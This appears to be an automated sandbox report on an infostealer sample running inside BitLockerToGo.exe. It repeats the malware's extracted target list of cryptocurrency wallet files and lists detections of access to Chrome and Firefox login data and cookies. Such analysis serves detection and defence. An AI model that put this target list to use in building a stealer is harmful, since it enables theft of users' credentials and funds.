Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000000.1681656576.00000000014D5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: #github.com/ethereum/go-ethereum/rlp
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
